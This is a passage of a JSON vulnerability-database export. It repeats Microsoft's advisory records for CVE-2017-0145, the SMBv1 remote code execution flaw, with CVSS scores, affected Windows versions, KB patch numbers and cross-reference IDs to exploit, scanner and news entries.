"KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T10:51:44", "differentElements": ["msAffectedSoftware"], "edition": 62}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "4b3c58a0de4c835f521b07a7a1b9b647", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-19T14:49:48", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL", "700099.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-19T14:49:48", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-19T14:49:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3177186", "KBMS16-110, 3187754", "KB3212646", "KB4013198", "KB4012215", "KB4012217", "KB4012213", "KB4013429", "KB3210721", "KB4012212", "KB4012606", "KB3213986", "KB4014077", "KB3205409", "KB3210720", "KB4012216", "KB4012214", "KB4012598", "KB3205401"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T14:49:48", "differentElements": ["msAffectedSoftware"], "edition": 63}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-19T16:52:15", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL", "700099.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-19T14:49:48", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-19T14:49:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205401", "KB4012216", "KB4012213", "KB4012215", "KB4013198", "KB4014077", "KB4012212", "KB3205409", "KB3213986", "KBMS16-110, 3187754", "KB4013429", "KB3210720", "KB4012214", "KB3212646", "KB4012598", "KB4012217", "KB3210721", "KB3177186", "KB4012606"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", 